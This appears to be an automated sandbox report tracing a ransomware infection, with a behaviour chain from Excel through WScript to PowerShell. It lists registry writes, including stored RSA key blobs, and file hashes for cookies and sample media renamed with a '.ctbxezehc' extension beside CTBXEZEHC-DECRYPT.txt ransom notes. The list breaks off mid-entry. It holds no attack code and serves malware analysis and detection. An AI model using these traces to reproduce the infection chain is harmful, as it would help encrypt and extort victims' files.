0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1311375383
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375504
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1311375364
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{2C08D2BE-9BA2-4C66-A82D-B6739C40C8C4}
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EE2E
20EE2E
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F03E29371EA9D4012EEE20002EEE200000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EF28
20EF28
040000009C0B00002F00000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0053004F004300200074006500730074002E0078006C0073006D00000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000001000000F8312A361EA9D40128EF200028EF200000000000AC020000660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375505
2972
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1311375506
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
100
2972
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
100
3328
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3328
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3596
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E00630074006200780065007A006500680063000000
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
0602000000A4000052534131000800000100010087B1C8902426719CC81A7EE0BCA862CEAF47055AFFD8C6D50714F665265938733D240D9BC3221C54687D15ADC961F79925F7DDD089A50C6F95FD75D6F4F37FD9A6B0BEFEC254F091E7A61BB5B07D23D89DA8BF92B30D9B05CDAE2A9B27895B171D69B60EF07906C9532E6DC0CB11E5EB3F9A74C8541E76BF0E8C8F81B38DB19ADA40D00AADAC1B428ED7814DBE8C1396F35A1FEDB0552DB5EC4D381FFF5FD842EB9F7DCEAC38A3F4E48C29867E72F82646350EA56EB881E579DC22EA02BB22DFBC30B8CD532B955166016C829FCA6B98C7919EE3F7511128647E66D77F736E9F3C7B0B2CAFB01CFCF27C83D24ACE6ACF56F41FD1459FDD47372DD86C8EA7F8AB
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
9404000062429ABE166B3D3E1C0F6E7A14078D758F7B98A04AE2167B84DE2AC816F180848DA68104F7B83259BEDB7A85BAFF5817716C9C234315F17DED4621F456C5E8CB6FBE509BDA2143491E567A6E1400B2E43D11AEAD560D48927908B5B62A9EE4C72149CFE68479891A8A180C184B2C6E1F0DD4D9EA82027379AF18E2FF41894B398CA10EA65B1F3C856A37D8A058AA7EE77A03CB75F86AEF7DE7FD5C56F7C9F010AADFA6B33B133B2EFEB1021BD40D0A0D40DFAC5B4346DCEE23EF17BCEC13B24F53164FD560609F6444617DFE6CE4AE8A48F99F5FA1E7940F470726A82983BA0A36B6AA085D2235DC91FE276DAE5995174C9EFEBD911CC2EB63F2DE7A50A1510596B943396CD40968DF23DEE3A6992251AD6CEB1A6C2603B03F6CF25E6632CDD663EA6093BCAC24C27781D04F39EA2883DFCA7F5FD6CBFA9A78F21779CB18667971B9D20E66A05813D17C603BBAB2FD65553D1A69611BB8D5492C1EA5323880A03E7251D0CBEA954CDA08734835A69D1C3D10643AE858F88660AB33021046E90475DE159D8CF70C47E082F4A1398398BE49C5843C29027A4C55E03F3247DA31B793683C3D1AF61C3C68200DD9F4B45847E306F48E9905109AA1A405394BD3F81FC95F538107FABC7D7F488B2CE4D87EBB47864EDA11560F5CD481A4652D7F6212904C2C7EAA32AA621B30949E4F5C60381FC5987258D340EBF399FBA68153A44C4A7BC7B98ECED49E9BBC120C43F7BE474BFEF6FBF635304D8868DE067F0AE59D17F6CB2D0E047FA39FB8FE4798F104981B3682C1B205823890808C0BB818DDBC7F3FE8123D1124CB7BA107E400B76423B77B1E7BFC0CB4CE403358379A0408513D65428C66F606EC111A7B92FBB30F6FF88E7EA7F824D825D841C017B2283D00324020814344FB63CC957AFAC7C601D1B54A554B021E342B3FDEFFC6797DE701A83FCF0026F07580C004830F1251C8E4771C9A778995F91A74F6A3E5388A6AEB0E7834F705079056EAE28E8D30692F07C916860581FED092D773E14A79FB55912DCFFC67B2ABFC2378857AE1B5AF57C4E45882981FBC5B1087F0477C01F00BCA1F3AA0D14AE66A2013C0113E68448C2D99371B28AADD0474B37DD9F8B2754E7950AF1067CE172A9C4454574160673608901E0918BBBFA942B3E4B3DA896DA8280879FA570637CCD39BAE1F08317FE9E378075E021ECD8486AA9CE634E7E05E643A776AA50081CD81A0E8ACCD9C500988A901184103AFE170472E39E4E1A06BAC3D6EF21049F7CA11EFDB5230AA72071A2556102E5C5CEA8F98C952A85E3574CEFB31D65DEF7D1724F868FDF945B4CBB04F5ED14947682ED2640F227DBF6CA5DA73C624042F72BC85B8459810B4DABA3C8A99923E831EC9D3E38BE6AB0798E33D766B90E68E4C3A3D18B57F15C5F06A6659D01CB1100C2B3CF1C169013A4A2C4A95F6BC1218858D7FC99929EF19F08D91A42BAB01A0E9D9B3AB926B7ED6A6DD3E932163E7EA5193283D05BBC64F8CCA0C4351D327053A00FF07C2168253FE69CE7441B20B3C5F22918176FAEF105FF841FFB4F7CE951819F093D4DD8838491E97ED03A9CBC7DBFBF7A0BC9D283E0C9A9832AF475DB9822EE339CA0647BF194AB2FC26E1EF093F2E7468096173F10C52CF7E6D3B3BBC8CDEC581833F8DBDAB62F46DFF7294B8AF689B025B610A4EC71011FE87AA2BCEA29A0EE4B7105572E79EDA56BB784D9780C2CB53F56BFDDC312DDC2E7A4A4ECC5717437A3CF529E6BBFF976027BDEE68EDA97DB88F41CFD073F855C754CCCEBC24E98B1E53BECE770569ABAB2BE565D32B648069FA84F097D26008E72AB224A0390C6BBE542B23444A0AC5CE329CD7B58B763BF02ED3E44D7E8BC93E59A7DE089CD6FC6F7DAE2B6557DC4BBB8324FC0B0771B03D0EDB1F4FD4F0CFB03A425BBFC79FF952A22964FDFDD79C1B4DD1F818C149B2B02402AA04F25184A80169463813240A4C7A8353806BA282E65CA6B6C4028FE8E50BE8270DAD7DF9E66F7452DD4FF6DF042BD87AC64D47895A01A68CD17F3C631AE3BC2C4E77D9E6EA48053F90F0C5B3BBBE92EAB1E5670F693069D43600D09378300280D474C01750D1CB858A41D6E8681BB1A09F2C4545A4FE5F765F21BF992945A5FA0AD0BE044E10B729D40F93FFB4E17573833314750AFE46C9DE9B1F3F2239A20170CAC4BD8823253D84DA0D319A5CC4390D7A25FB738DF1FC0D3B2E9D9DDCEA1E08AF2379FDB3A4F0375D4DB138D5577DC49CBEB108A24F712D1D7DE317EA546D673580EE2009FD04643E6452B109D814D14BC28BD853E330A582D670B723BDB35CDB736BC882D26CF29D4D3BFC482D15A4C384C59A6B7D2B9D3BD792B3AC025C6F3EEF0FAA06C0D9
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3596
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3596
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000

Files activity

Executable files
0
Suspicious files
289
Text files
237
Unknown types
7

Dropped files

PID
Process
Filename
Type
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: ce40e23e4021619f2fda2133d99da66e
SHA256: 245707b274d0d69490bfaf5081c4acfc5a83984b051946014fa00b415ac6ad4d
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3345959086bslnoocdkdlaiFs2t%s.sqlite
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bc09a4f5ed304ab973a6dd151678aa2a
SHA256: 1cb74a0767e75b02c6718b220021cf1458a622db008719f2dfd96b0163e670ba
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 17593987d92e54a6aa19c3f68c269ab8
SHA256: 5ecaac6bf731cd4eee351c3bd4f1d429e4801ab23aeb9153cf0145cee13c7bdf
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 0a4cd24768fd1d38f6fd2b73397d0a20
SHA256: 1b008428d73d11c211a58163c4a061659b5b83dab5a800302f410145ae8194ba
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 8b9af33189bf47995844088ed8388a62
SHA256: 527ca967a00107e9b56d260056b7d1c16a634b68a0888ba0db8cb8e64852c198
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: b2eee648ea4c0e15bd7c8f91e9accc20
SHA256: 85653cf2290a9c6db42300f564db50543a70b31aa4d374a002191cd35edce4ca
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: edc2e924014f7cf6a783b66258b7a53d
SHA256: b4e7c476087984b1f985b3296ebce99b5b8e3c71c61f1cbcbd26d583b416c62b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5511b4904e788dfa6889e6ae2b64a07f
SHA256: e57c7ff0c81c94fd93323a5e1b82fcf13b6ac976f1bd0abb6bff07cd672c548b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 91d95443884efa4d45481305fb9f48b4
SHA256: 3e40d199afda655cdccab598e3e63901cf229bfe615a4716524fc81380286a07
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2cb5e2c2dd3e90c13f53b2b39c15a02b
SHA256: fc6fe55d3eb55a0d26a041627955e09d7d0fc2fb94971da219cc146f506ec380
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 1ff395df70318b735535efedf4c62992
SHA256: 11407d67cec1cbb0399398ae6966e523622d6bf7a67de40512ab8add763cacaf
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2943777d75e844b5779dc79eb3d522c1
SHA256: d37303dc56c4defdd9f9c632d41c5cb4f34cdb0f55a90484eb8b56e3d252fb6f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: fb6eb60f75fee415196ecfa9513785a3
SHA256: a48e6bb5ccf9ce170e719e931c9aee0aa9c112508534dba047149a60e4b4a603
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 0860765b21d518c573c958a761fabb8a
SHA256: 7d232d00425144468506fbd9a43911ca8c1bc5e6b8960c60cf74810739f2f4cb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: db6940943b0f758009b82b83282f022a
SHA256: 9369dd6f949855be49849c42e4ced293fb2f0dd3d409edaf7f30b172560986e0
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9f2b69ac0d615142ae3fcebd5dcbca4a
SHA256: d1510915df5b7eac9f728c10727c4dbd4bc9825f80501d37cba66173063bce9e
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: becb8210f95491e0d59cc26205625592
SHA256: 1eb196f56ed620c0d176bd922301433fec347e9f9e9f0a01d596ba58f9a6c981
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: cd3c1e9796d4154ec39a3a82a278f4ac
SHA256: 787c61114319744736bb39b7ee1d19dd9ce18b6eff9921d3f3136a0d7abe0182
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 85bd3fa695f0173d861806b172f6ceeb
SHA256: b0a0527170900eb8ee440e7e6909199c1578dd2440ae4e0156f6e0f94b114294
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bcfea57dabe93266c45fe88ed347614a
SHA256: 946a8cf89175746abd481cf5aff720650a0fa2f32e913828d5cc690834906623
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5a7488b0ef276dbf7f7dbf1a69686ea7
SHA256: 1680547e9c9a8ad453f4b2c46e7822adeee5dbc906d7593b76b327a278dcce28
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 34508b67d1d61ebb83b2c715addf395e
SHA256: 8cc85bdcaf273dd36ded40690bf382871c2c0dd1a53460085c4ede83ada9f7ff
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 5ed2907838e5d050abc700d198575307
SHA256: d5a15db22640c86e92a35029163455b6c6fce8fe12283720c0d108c83677e93f
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 0d21ce6c9ca975dc077aa5feca26ed02
SHA256: 415503ad5ccf416666e279a45ed2b2dadf7cbe0169fae62b37b04cba6c0e818b
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: bfd3fed9b65714ea515b08822a73479c
SHA256: ece499aa1b843c0a50056fb65f61fef48cd1f7d6927c38a4e660407d2e171241
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 61dd65f92c01c3e41fec306cea592e4e
SHA256: 2ca243eeb453e5a1547afec2aa7be31443e5552d00a25c72301d41293ee75023
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2a18fa526700b07511a9721653f36b27
SHA256: 7c4f110132516b36f63306915abc4456d024e3461dd305be376e17ebc962df72
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: 08869946305f946e350bdd24b381c7af
SHA256: 79233caa99d95f72de4e5f2b6c91a60d9c11da64b1de6e942990c916df25ba9c
3596
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: a902cf373e02f7dc34f456ed7449279c
SHA256: ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarA056.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabA055.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9F89.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9F88.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9F77.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9F76.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 781623bcc4f50e8aa21c9325fea77bc9
SHA256: f98fc88f457ece0609219b8463897010cb110d9208c1580fa2fe16bb6b4bb9eb
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9e1d55e07d822255053efad9c2800d31
SHA256: 1f0438d3f92ce1218c992f1e55df97e637b8fbf199a0bd47bc4e7675eef384ad
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 56b4ec35bf89566c358db45e6924f78b
SHA256: ae7d6ef55045c579b9d6395af91f16c5e05361287f12c64fd6f738154811e7b1
3596
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: 5862fecf0bfed2c21450fbfcec77bdb6
SHA256: d4804e66c77abee25d9a4d4afb64cd63981408c5fc18e1d42b80f7d59c2afc01
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Videos\Sample Videos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Recorded TV\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.ctbxezehc
binary
MD5: ff844462d07bf588a7d679261c31b3fa
SHA256: 6ade8bf5f3c95abfe601eef2df0502af75a9a903ae2c0a2c49440628c69dc289
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.ctbxezehc
binary
MD5: 549e342263163423683e146a866d6841
SHA256: 09f193c943df19b38715e95021b59bc7cc89f53689e0113a854f83c4512310e5
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.ctbxezehc
binary
MD5: 91db7751cdcbe3962e19465527d7156e
SHA256: aed7e82d9e806c9f2ba1260119e5ae9c7dfb771fa43cc5dd3d331a79a2dfdf65
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.ctbxezehc
binary
MD5: 9a934abd965880675a8b4069cbc77da6
SHA256: 817e600ab1b1da6a4b7536ab1359e85af018c301704e74ca3aa22b5f72bbdf0d
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.ctbxezehc
binary
MD5: b89daa85f58e2987982086b4aaee5336
SHA256: ef40228e93c5d4fc89043f2fa58bfdf2d2799799a835291eac38fc65986a0d8a
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.ctbxezehc
binary
MD5: 9a5206754bec16f4e99526089f6201de
SHA256: 0803d4b7467dee6aa9a4fe626648db7bc1efac18907f2c33c6bcb2535f06c9d3
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.ctbxezehc
binary
MD5: 2db8f1280357d987dbcb8ce5f5a6ddea
SHA256: 8bf5c01f369b8093b3e848ce50ef395a39971f177f07a33d94b6c21f1628bea3
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.ctbxezehc
binary
MD5: 61e03c4f428870d06e7749774be97085
SHA256: 4efce452a2abba6c1b18a77c6402ee41bf585cb188d72704b32b989f33afe7b8
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
